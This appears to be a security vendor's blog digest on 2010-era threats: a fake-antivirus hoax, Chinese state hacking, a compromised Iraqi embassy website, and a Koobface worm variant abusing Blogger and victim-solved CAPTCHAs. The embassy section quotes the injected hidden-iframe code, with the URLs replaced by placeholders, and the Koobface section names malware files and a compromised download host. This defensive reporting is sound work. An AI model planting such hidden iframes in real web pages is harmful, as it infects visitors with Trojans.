Hackers are spreading a rumor regarding Facebook, describingit as a botnet that is used it to infect Facebook users with rogueanti-malware.

In the last 48 hours a rumor was spread claiming that an“unnamed app” in Facebook is actually a bot Trojan. The rumor was a hoax, andhackers used it to distribute malicious fake antivirus software (Rougeanti-malware). When Googling for “unnamed app”, people received links to siteswhich pose as security sites but are actually fake antivirus traps – rogueanti-malware sites.

Please be aware.

The malicious activity that comes from Chinese servers isknown for a long time. In many cases we are seeing the use of Chinese serversby bots that being spread over the web. Most of these bots are beingpropagated in order to steal identity, information, backdoor etc’.

But there is also other activity, unlike these bots that arebeing operated by hackers there is also a cyber-war.

We know that countries are using hacking techniques in orderto espionage against other countries, security organizations employing hackersin order to penetrate to other countries servers, and from the Google incidentin China we actually know something that was clear to everybody – the bigbrother is watching you.  

The “Foreign Policy” web site (http://www.foreignpolicy.com/)published a very interesting article that reviews the top 10 Chinese cyberattacks (that we know of) against US government sites:

http://thecable.foreignpolicy.com/posts/2010/01/22/the_top_10_chinese_cyber
_attacks_that_we_know_of

The official website of the Embassy of Iraq in Tehran was compromised with a malicious script that exploits multiple vulnerabilities.  Upon the execution of the malicious script, an obfuscated hidden IFrame leads to another obfuscated exploit. Visitors of the embassy website may end up with a Trojan downloader taking over their system.

The malicious script was found inside the main page of the Embassy’s website: iraqembassy.ir. The exploit is currently unrecognized by other anti-virus vendors. All of our competitors fail to block the exploit and the installed Trojan. The JavaScript obfuscated IFrame code is detected by eSafe as:  JS.Obfuscate.

The following are details of this attack. Note that the links to exploits and Trojans were replaced with [Trojan-server].

 1. The executed Script code in the website’s main page:  iframe name=c10 src='http://[Trojan-server].html' width=536 height=105 style='visibility:hidden'></iframe>')</SCRIPT>

 2. The hidden IFrame element executed by the Web browser refers to another IFrame element located on a server in Latvia: <iframe style="position: absolute; top: 10; left: 124; width: 546px; height: 524px; visibility: hidden" frameborder="0" scrolling="no" src="<Trojan-Server>?sid=1"></iframe>

 3. The second IFrame element refers the browser to an obfuscated page that contains multiple exploits.

 4. The obfuscated multiple exploitation scripts page attempts to gain control over the affected system by installing a Trojan Downloader.

After using Geocities as its main redirection point, Koobface worm is now taking advantage of Google’s Blogger to redirect Facebook users to malware websites.

In this latest attack, the worm sends messages to Facebook users urging them to watch a video which appears to be on Blogger. Victims of this attack will end up infecting their system with the latest Koobface worm from a fake YouTube website. In order to randomly create Blogger accounts to be used for the redirections to the malicious domains, this Koobface variant requires a little help from you, to read CAPTCHAs.

This attack uses tempting messages such as “You look so fine in this video”; here is how the messages may look like:

If the user complies with this message and clicks the proposed blogpost.com link, he will get redirected to a fake YouTube website. The fake YouTube will require the user to install an alleged “Adobe Flash Player Installer” (Flash_Update.exe) in order to be able to watch the video. Executing Flash_Update.exe will infect the system with Koobface worm.

The following details explain how this attack works:
Flash_Update.exe downloads a couple of executables: google_reg.exe and captcha.exe from aibcvienna.org, which appears to be a legitimate website compromised by the hackers, into the affected system. It’s important to note that the domain also includes other executables tailored for hi5 and Myspace users.

The file google_reg.exe attempts to create new Google accounts, where it needs the help of humans in reading the CAPTCHA. It uploads the CAPTCHA image to a server and waits for captcha.exe to download it. The captcha.exe drops a file named captcha5.dll into the Program Files directory and runs it using rundll32.exe, a system file used for executing .dll files. The dropped dll file displays a shutdown window which freezes the system and threatens the user to enter the characters seen in an image before a 3 minutes countdown timer ends. The image is in fact the CAPTCHA that google_reg.exe is waiting for to be deciphered by the victim.

Once entered, the characters will be sent back to the server where google_reg.exe is waiting for them to finish creating the blogspot.com account for later use of attacking other Facebook users.